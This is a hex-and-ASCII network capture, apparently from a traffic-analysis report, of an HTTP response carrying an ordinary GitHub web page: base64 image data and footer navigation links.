                                                                                                                                  2022-10-17 20:07:12 UTC613INData Raw: 22 0a 20 20 20 20 20 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 54 41 41 41 41 42 37 43 41 4d 41 41 41 44 45 7a 53 7a 61 41 41 41 41 41 33 4e 43 53 56 51 49 43 41 6a 62 34 55 2f 67 41 41 41 42 67 46 42 4d 56 45 58 2f 2f 2f 2f 6a 79 5a 7a 30 32 4b 57 32 70 48 76 64 78 5a 75 32 70 59 4c 6e 79 35 66 76 31 71 57 46 65 6c 37 56 75 34 4f 6c 6d 6e 61 73 6e 48 75 79 6e 33 75 4b 66 6d 4c 65 78 5a 62 56 76 70 53 45 65 32 4c 6b 78 35 54 73 32 37 4c 53 75 49 58 47 73 34 76 46 73 49 72 5a 78 4a 62 73 30 61 4c 50 76 4a 4f 36 70 34 50 70 32 72 48 6c 7a 5a 33 57 76 59 33 50 75 6f 37 64 79 36 44 61 79 61 48 4f 74 6f 54 64 77 5a 4a 75 61 46 76 4a 73 6e 36 6c
                                                                                                                                  Data Ascii: " src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAATAAAAB7CAMAAADEzSzaAAAAA3NCSVQICAjb4U/gAAABgFBMVEX////jyZz02KW2pHvdxZu2pYLny5fv1qWFel7Vu4OlmnasnHuyn3uKfmLexZbVvpSEe2Lkx5Ts27LSuIXGs4vFsIrZxJbs0aLPvJO6p4Pp2rHlzZ3WvY3Puo7dy6DayaHOtoTdwZJuaFvJsn6l
                                                                                                                                  2022-10-17 20:07:12 UTC615INData Raw: 33 64 62 65 6f 54 37 50 73 6b 6d 43 58 69 4d 76 74 50 71 74 74 48 49 74 33 5a 35 54 48 31 7a 45 7a 4d 79 67 35 39 6c 65 37 7a 32 6f 37 78 79 39 76 74 64 78 4c 31 43 36 39 65 69 55 42 2b 7a 2b 30 59 64 50 7a 33 38 33 4e 33 62 70 79 35 63 72 39 38 7a 6f 65 76 58 6e 30 38 4d 57 4c 68 77 39 2f 75 69 39 57 58 76 6c 68 62 6d 35 36 33 6c 54 43 70 32 2b 50 48 7a 64 34 39 51 32 2b 66 53 55 30 2f 2f 57 66 37 54 33 35 4c 59 7a 35 69 33 4f 33 37 6a 2b 2f 47 30 64 2b 66 36 56 44 52 74 6a 42 34 38 44 5a 58 52 68 52 56 42 2b 34 2b 2b 4c 5a 6c 61 6e 2f 76 74 57 65 51 69 41 32 4f 48 52 43 4d 4f 7a 2f 6f 6d 4f 30 37 2b 4b 74 70 7a 2f 2f 47 6b 63 63 4a 77 4f 57 6e 49 51 49 58 4d 68 42 55 33 47 30 38 37 55 77 58 2b 56 79 4c 4d 4f 72 48 76 72 62 34 7a 55 39 64 2b 76 71 72 37
                                                                                                                                  Data Ascii: 3dbeoT7PskmCXiMvtPqttHIt3Z5TH1zEzMyg59le7z2o7xy9vtdxL1C69eiUB+z+0YdPz383N3bpy5cr98zoevXn08MWLhw9/ui9WXvlhbm563lTCp2+PHzd49Q2+fSU0//Wf7T35LYz5i3O37j+/G0d+f6VDRtjB48DZXRhRVB+4++LZlan/vtWeQiA2OHRCMOz/omO07+Ktpz//GkccJwOWnIQIXMhBU3G087UwX+VyLMOrHvrb4zU9d+vqr7
                                                                                                                                  2022-10-17 20:07:12 UTC616INData Raw: 6b 35 64 73 6e 51 6b 77 6e 4a 6b 59 55 65 59 32 6d 6d 69 37 53 35 43 6d 58 4a 57 76 39 4a 75 76 4e 61 62 59 55 49 6d 58 70 53 63 49 61 31 4a 38 4e 48 4a 56 58 62 49 73 77 54 4a 5a 71 43 39 61 4b 76 32 2f 2b 6b 55 78 37 54 49 71 6e 37 70 70 54 41 4d 7a 53 39 68 6d 56 6b 7a 51 2f 69 45 55 4c 48 47 34 38 33 46 39 75 47 31 61 4c 45 6a 7a 53 57 6b 4e 33 64 7a 32 78 42 61 74 69 76 31 63 78 62 64 65 4e 36 42 34 43 65 31 54 43 39 47 62 54 50 2b 61 38 35 31 70 68 7a 4d 55 71 57 4e 41 4e 70 77 55 35 69 47 47 37 76 31 65 35 5a 67 4b 53 56 64 72 46 55 4e 42 4b 4c 33 32 34 4f 58 4b 31 38 64 69 5a 61 6c 41 6f 61 79 6c 6c 59 4f 34 49 43 70 52 79 45 53 38 34 78 56 72 77 4d 4e 36 46 65 4a 6f 48 76 65 44 72 78 75 75 32 31 4a 58 33 41 30 6a 46 64 47 4f 35 2b 7a 49 6e 54 64
                                                                                                                                  Data Ascii: k5dsnQkwnJkYUeY2mmi7S5CmXJWv9JuvNabYUImXpScIa1J8NHJVXbIswTJZqC9aKv2/+kUx7TIqn7ppTAMzS9hmVkzQ/iEULHG483F9uG1aLEjzSWkN3dz2xBativ1cxbdeN6B4Ce1TC9GbTP+a851phzMUqWNANpwU5iGG7v1e5ZgKSVdrFUNBKL324OXK18diZalAoayllYO4ICpRyES84xVrwMN6FeJoHveDrxuu21JX3A0jFdGO5+zInTd
                                                                                                                                  2022-10-17 20:07:12 UTC617INData Raw: 49 2b 69 49 67 41 31 2b 31 43 74 69 61 61 56 77 45 34 73 50 55 7a 4b 49 55 4a 69 33 44 67 53 6b 56 30 49 33 41 39 73 46 53 52 46 67 2b 75 44 39 52 34 49 39 79 44 6e 47 53 45 61 45 67 77 63 54 4d 4b 4d 4d 2b 2b 6d 7a 7a 36 4f 54 49 73 77 6f 69 58 39 56 57 42 78 66 58 63 31 62 77 6b 73 6a 35 5a 6e 50 46 4b 58 64 73 51 64 64 62 4b 72 44 69 6f 78 45 44 6b 2b 69 72 64 78 68 46 71 43 7a 4e 44 69 7a 41 77 45 55 46 56 66 5a 39 44 51 45 47 2f 6f 54 6c 49 79 78 55 57 2f 32 48 53 79 74 63 57 56 79 77 49 6e 6a 4c 67 66 4e 6b 64 41 49 55 72 4b 51 6a 41 47 47 47 58 45 59 53 33 4e 77 6f 53 68 4a 4c 51 4b 76 49 73 54 5a 36 58 6b 52 58 73 55 47 47 73 58 72 43 44 69 52 56 76 31 57 76 66 34 64 7a 68 7a 6b 49 33 34 66 63 69 6f 68 71 4a 72 6b 69 71 4b 6a 51 66 71 79 72 6d 49
                                                                                                                                  Data Ascii: I+iIgA1+1CtiaaVwE4sPUzKIUJi3DgSkV0I3A9sFSRFg+uD9R4I9yDnGSEaEgwcTMKMM++mzz6OTIswoiX9VWBxfXc1bwksj5ZnPFKXdsQddbKrDioxEDk+irdxhFqCzNDizAwEUFVfZ9DQEG/oTlIyxUW/2HSytcWVywInjLgfNkdAIUrKQjAGGGXEYS3NwoShJLQKvIsTZ6XkRXsUGGsXrCDiRVv1Wvf4dzhzkI34fciohqJrkiqKjQfqyrmI
                                                                                                                                  2022-10-17 20:07:12 UTC619INData Raw: 70 41 46 32 61 50 55 6d 46 46 66 30 67 59 62 71 36 52 52 67 4f 62 4c 35 44 66 55 43 6a 61 71 68 30 79 68 68 6a 6e 74 6c 61 4f 43 50 6d 71 57 62 52 72 41 6e 31 72 4a 72 59 73 43 4c 77 5a 36 6e 34 68 72 65 6f 41 4d 59 7a 37 66 49 30 4c 6f 6a 58 41 42 32 47 67 46 32 6e 32 64 6e 58 6b 72 4a 62 46 41 38 74 45 4b 76 61 72 61 39 44 39 2f 57 48 32 66 6d 39 59 35 42 69 69 79 44 7a 66 5a 47 5a 67 78 64 42 48 46 56 6f 70 73 35 41 47 51 4a 32 56 54 54 34 42 68 45 71 49 69 32 56 63 35 64 4d 46 73 42 52 4e 41 47 6d 70 44 76 57 7a 36 72 36 74 63 64 72 4f 77 64 54 46 4b 48 49 67 4e 33 57 62 66 52 6f 38 53 6c 35 32 50 72 33 6f 34 4a 4d 61 55 65 38 43 63 45 54 46 4d 65 77 6f 31 57 46 48 45 76 69 53 6c 70 41 62 48 74 73 53 36 73 39 58 5a 64 4f 66 6f 77 5a 62 6b 48 66 48 56
                                                                                                                                  Data Ascii: pAF2aPUmFFf0gYbq6RRgObL5DfUCjaqh0yhhjntlaOCPmqWbRrAn1rJrYsCLwZ6n4hreoAMYz7fI0LojXAB2GgF2n2dnXkrJbFA8tEKvara9D9/WH2fm9Y5BiiyDzfZGZgxdBHFVops5AGQJ2VTT4BhEqIi2Vc5dMFsBRNAGmpDvWz6r6tcdrOwdTFKHIgN3WbfRo8Sl52Pr3o4JMaUe8CcETFMewo1WFHEviSlpAbHtsS6s9XZdOfowZbkHfHV
                                                                                                                                  2022-10-17 20:07:12 UTC620INData Raw: 4a 61 32 67 6e 52 63 50 6f 74 6b 43 41 61 67 62 61 57 48 33 53 4f 47 41 72 51 43 35 55 47 64 76 47 45 6f 6c 6f 35 6b 4d 2f 5a 52 64 6a 6e 72 48 62 62 55 7a 43 47 4c 6c 59 6f 59 73 5a 77 2f 4a 34 37 78 73 48 65 71 7a 4f 74 33 56 6b 71 69 36 49 34 73 39 54 55 39 38 66 57 32 67 4d 4d 47 77 5a 45 63 6e 70 4f 33 4c 4b 57 63 6e 49 4c 59 62 35 48 4b 61 6d 68 71 65 78 2b 2b 63 78 46 55 48 6b 46 5a 6b 4d 72 41 5a 63 66 6b 54 55 35 42 47 6f 4c 36 6b 46 72 41 44 50 6f 2b 52 74 30 62 63 50 78 2b 35 45 4b 62 4a 57 52 37 74 32 37 2b 37 71 36 76 70 71 2f 2f 36 44 6c 36 66 47 76 70 2f 64 78 4d 6d 2b 6d 35 79 63 57 6c 74 62 57 31 39 66 50 37 2b 79 38 71 62 63 65 43 37 35 53 44 7a 63 61 4a 64 4b 46 45 66 66 76 53 6a 45 59 6c 38 77 6a 43 53 4d 79 6a 34 6a 51 6d 6f 75 6e 5a
                                                                                                                                  Data Ascii: Ja2gnRcPotkCAagbaWH3SOGArQC5UGdvGEolo5kM/ZRdjnrHbbUzCGLlYoYsZw/J47xsHeqzOt3Vkqi6I4s9TU98fW2gMMGwZEcnpO3LKWcnILYb5HKamhqex++cxFUHkFZkMrAZcfkTU5BGoL6kFrADPo+Rt0bcPx+5EKbJWR7t27+7q6vpq//6Dl6fGvp/dxMm+m5ycWltbW19fP7+y8qbceC75SDzcaJdKFEffvSjEYl8wjCSMyj4jQmounZ
                                                                                                                                  2022-10-17 20:07:12 UTC622INData Raw: 45 55 67 41 41 41 48 51 41 41 41 41 79 43 41 4d 41 41 41 43 36 52 51 39 6b 41 41 41 41 41 33 4e 43 53 56 51 49 43 41 6a 62 34 55 2f 67 41 41 41 42 67 46 42 4d 56 45 58 2f 2f 2f 2f 6b 79 5a 6d 31 70 49 44 65 78 70 72 37 33 71 71 6e 6d 6e 61 6c 6c 6e 47 6e 6d 6e 6e 33 33 61 71 6a 6c 58 6e 31 32 61 6e 73 7a 70 69 37 70 34 50 55 76 5a 50 75 31 61 58 50 75 6f 36 74 6d 33 7a 72 30 61 4c 66 78 5a 62 4e 74 34 78 78 62 57 4f 55 69 6d 36 79 6e 33 6c 37 63 32 4e 73 61 46 32 2b 72 49 53 74 6d 33 79 6f 6d 34 43 32 6f 33 76 32 32 4b 53 7a 6e 57 2b 72 6e 49 47 65 6a 47 75 71 6c 6d 33 5a 78 4a 5a 78 62 57 4e 30 62 46 76 55 76 5a 50 76 30 4a 76 6e 7a 5a 32 4d 66 6d 50 41 72 59 71 37 70 34 50 58 76 6f 37 51 75 35 4c 46 73 6f 71 2b 72 49 52 73 61 57 44 78 30 35 37 45 72 59
                                                                                                                                  Data Ascii: EUgAAAHQAAAAyCAMAAAC6RQ9kAAAAA3NCSVQICAjb4U/gAAABgFBMVEX////kyZm1pIDexpr73qqnmnallnGnmnn33aqjlXn12anszpi7p4PUvZPu1aXPuo6tm3zr0aLfxZbNt4xxbWOUim6yn3l7c2NsaF2+rIStm3yom4C2o3v22KSznW+rnIGejGuqlm3ZxJZxbWN0bFvUvZPv0JvnzZ2MfmPArYq7p4PXvo7Qu5LFsoq+rIRsaWDx057ErY
                                                                                                                                  2022-10-17 20:07:12 UTC623INData Raw: 38 6f 49 51 62 45 33 54 31 45 52 55 6b 69 45 77 45 6e 67 6a 49 4f 73 64 72 76 64 67 72 51 78 2b 79 7a 48 74 36 63 35 78 75 69 6c 33 77 6c 62 67 42 4a 47 45 47 59 30 47 6b 38 34 68 50 34 6b 2b 69 64 68 2b 50 78 6e 50 6e 57 6b 47 49 75 48 32 74 47 30 41 49 76 51 57 41 73 58 52 71 46 52 69 79 2b 4f 78 6b 79 45 32 6f 47 6c 79 64 2b 77 50 50 31 49 66 65 45 36 77 53 65 68 39 42 2f 6e 6d 4b 42 35 73 5a 6a 4a 5a 6a 4e 65 44 47 75 68 36 6c 50 55 6b 36 42 54 46 69 56 64 49 71 57 46 57 71 52 30 61 76 73 5a 5a 32 67 31 6d 36 46 58 44 4c 52 59 6f 51 75 5a 7a 45 51 53 56 45 53 73 61 55 2f 6d 69 37 4a 79 45 65 70 54 77 45 30 2b 56 52 42 61 61 59 46 47 7a 6d 59 6e 59 71 43 79 68 6b 75 31 31 50 55 45 39 7a 72 76 47 4a 33 57 52 45 4b 47 36 48 46 4b 32 54 56 46 56 79 61 64
                                                                                                                                  Data Ascii: 8oIQbE3T1ERUkiEwEngjIOsdrvdgrQx+yzHt6c5xuil3wlbgBJGEGY0Gk84hP4k+idh+PxnPnWkGIuH2tG0AIvQWAsXRqFRiy+OxkyE2oGlyd+wPP1IfeE6wSeh9B/nmKB5sZjJZjNeDGuh6lPUk6BTFiVdIqWFWqR0avsZZ2g1m6FXDLRYoQuZzEQSVESsaU/mi7JyEepTwE0+VRBaaYFGzmYnYqCyhku11PUE9zrvGJ3WREKG6HFK2TVFVyad
                                                                                                                                  2022-10-17 20:07:12 UTC624INData Raw: 76 4f 35 2b 30 59 6a 74 6a 55 6c 7a 35 36 4d 4f 50 58 36 42 34 2f 2f 4e 53 6f 2f 48 64 6e 54 76 66 39 7a 59 33 4e 33 75 39 2f 66 58 31 39 58 76 33 37 6b 39 69 36 4a 58 4a 2b 7a 4d 63 46 36 59 35 66 75 78 30 31 74 59 36 61 35 31 57 71 7a 58 57 63 72 53 2f 41 47 53 68 6a 35 6e 6f 47 72 5a 4d 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 6c 67 20 6d 74 2d 35 20 70 78 2d 33 22 3e 0a 20 20 3c 21 2d 2d 20 27 22 60 20 2d 2d 3e 3c 21 2d 2d 20 3c 2f 74 65 78 74 61 72 65 61 3e 3c 2f 78 6d 70 3e 20 2d 2d 3e 3c 2f 6f 70 74 69 6f 6e 3e 3c 2f 66 6f 72 6d 3e 3c 66 6f 72 6d 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 20 64 61 74 61 2d
                                                                                                                                  Data Ascii: vO5+0YjtjUlz56MOPX6B4//NSo/HdnTvf9zY3N3u9/fX19Xv37k9i6JXJ+zMcF6Y5fux01tY6a51WqzXWcrS/AGShj5noGrZMAAAAAElFTkSuQmCC"> </div> </div><div class="container-lg mt-5 px-3"> ... '"` -->... </textarea></xmp> --></option></form><form role="search" data-
                                                                                                                                  2022-10-17 20:07:12 UTC626INData Raw: 72 65 66 3d 22 2f 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 68 6f 6d 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 68 6f 6d 65 26 71 75 6f 74 3b 7d 22 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 6f 20 74 6f 20 47 69 74 48 75 62 20 68 6f 6d 65 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22 33
                                                                                                                                  Data Ascii: ref="/" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to home&quot;,&quot;label&quot;:&quot;text:home&quot;}" class="color-fg-default d-inline-block" aria-label="Go to GitHub homepage"> <svg height="3
                                                                                                                                  2022-10-17 20:07:12 UTC627INData Raw: 30 20 32 2e 35 32 2d 2e 37 37 20 32 2e 35 32 2d 2e 37 37 73 2e 30 35 2e 33 39 2e 30 38 2e 34 35 63 2e 30 32 2e 30 35 2e 30 39 2e 30 39 2e 31 36 2e 30 39 68 31 2e 33 34 63 2e 31 31 20 30 20 2e 31 37 2d 2e 30 38 2e 31 37 2d 2e 31 37 6c 2e 30 32 2d 37 2e 34 37 63 30 2d 2e 30 39 2d 2e 30 38 2d 2e 31 37 2d 2e 31 39 2d 2e 31 37 7a 6d 2d 32 33 2e 37 2d 2e 30 31 68 2d 32 2e 31 33 63 2d 2e 30 39 20 30 2d 2e 31 37 2e 30 39 2d 2e 31 37 2e 32 76 37 2e 33 34 63 30 20 2e 32 2e 31 33 2e 32 37 2e 33 2e 32 37 68 31 2e 39 32 63 2e 32 20 30 20 2e 32 35 2d 2e 30 39 2e 32 35 2d 2e 32 37 56 36 2e 32 33 63 30 2d 2e 30 39 2d 2e 30 38 2d 2e 31 37 2d 2e 31 37 2d 2e 31 37 7a 6d 2d 31 2e 30 35 2d 33 2e 33 38 63 2d 2e 37 37 20 30 2d 31 2e 33 38 2e 36 31 2d 31 2e 33 38 20 31 2e 33 38
                                                                                                                                  Data Ascii: 0 2.52-.77 2.52-.77s.05.39.08.45c.02.05.09.09.16.09h1.34c.11 0 .17-.08.17-.17l.02-7.47c0-.09-.08-.17-.19-.17zm-23.7-.01h-2.13c-.09 0-.17.09-.17.2v7.34c0 .2.13.27.3.27h1.92c.2 0 .25-.09.25-.27V6.23c0-.09-.08-.17-.17-.17zm-1.05-3.38c-.77 0-1.38.61-1.38 1.38
                                                                                                                                  2022-10-17 20:07:12 UTC628INData Raw: 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 66 65 61 74 75 72 65 73 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 66 65 61 74 75 72 65 73 22 3e 46 65 61 74 75 72 65 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75
                                                                                                                                  Data Ascii: uot;,&quot;label&quot;:&quot;text:features&quot;}" href="/features">Features</a> </li> <li class="lh-condensed mb-3"> <a class="Link--secondary" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&qu
                                                                                                                                  2022-10-17 20:07:12 UTC630INData Raw: 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 74 68 65 20 72 65 61 64 6d 65 20 70 72 6f 6a 65 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 74 68 65 20 72 65 61 64 6d 65 20 70 72 6f 6a 65 63 74 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 72 65 61 64 6d 65 22 3e 54 68 65 20 52 65 61 64 4d 45 20 50 72 6f 6a 65 63 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61
                                                                                                                                  Data Ascii: category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to the readme project&quot;,&quot;label&quot;:&quot;text:the readme project&quot;}" href="/readme">The ReadME Project</a> </li> <li class="lh-condensed mb-3"> <a
                                                                                                                                  2022-10-17 20:07:12 UTC631INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 61 70 69 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 61 70 69 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 67 69 74 68 75 62 2e 63 6f 6d 22 3e 44 65 76 65 6c 6f 70 65 72 20 41 50 49 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: <a class="Link--secondary" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to api&quot;,&quot;label&quot;:&quot;text:api&quot;}" href="https://docs.github.com">Developer API</a> </li>
                                                                                                                                  2022-10-17 20:07:12 UTC632INData Raw: 69 73 74 2d 73 74 79 6c 65 2d 6e 6f 6e 65 20 66 35 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 68 65 6c 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 44 6f 63 73 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74
                                                                                                                                  Data Ascii: ist-style-none f5"> <li class="lh-condensed mb-3"> <a class="Link--secondary" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to help&quot;,&quot;label&quot;:&quot;text:Docs&quot;}" href="ht
                                                                                                                                  2022-10-17 20:07:12 UTC634INData Raw: 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 73 74 61 74 75 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 73 74 61 74 75 73 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 2f 22 3e 53 74 61 74 75 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74
                                                                                                                                  Data Ascii: ooter&quot;,&quot;action&quot;:&quot;go to status&quot;,&quot;label&quot;:&quot;text:status&quot;}" href="https://www.githubstatus.com/">Status</a> </li> <li class="lh-condensed mb-3"> <a class="Link--secondary" data-analyt
                                                                                                                                  2022-10-17 20:07:12 UTC635INData Raw: 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 63 61 72 65 65 72 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 63 61 72 65 65 72 73 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2f 63 61 72 65 65 72 73 22 3e 43 61 72 65 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20
                                                                                                                                  Data Ascii: dary" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to careers&quot;,&quot;label&quot;:&quot;text:careers&quot;}" href="/about/careers">Careers</a> </li> <li class="lh-condensed mb-3">
                                                                                                                                  2022-10-17 20:07:12 UTC636INData Raw: 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 78 6c 20 70 2d 72 65 73 70 6f 6e 73 69 76 65 20 66 36 20 70 79 2d 34 20 64 2d 73 6d 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 72 6f 77 2d 72 65 76 65 72 73 65 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 73 74 79 6c 65 2d 6e 6f 6e 65 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 69 74 65 6d 73
                                                                                                                                  Data Ascii: </li> </ul> </div> </div> </div> <div class="color-bg-subtle"> <div class="container-xl p-responsive f6 py-4 d-sm-flex flex-justify-between flex-row-reverse flex-items-center"> <ul class="list-style-none d-flex flex-items
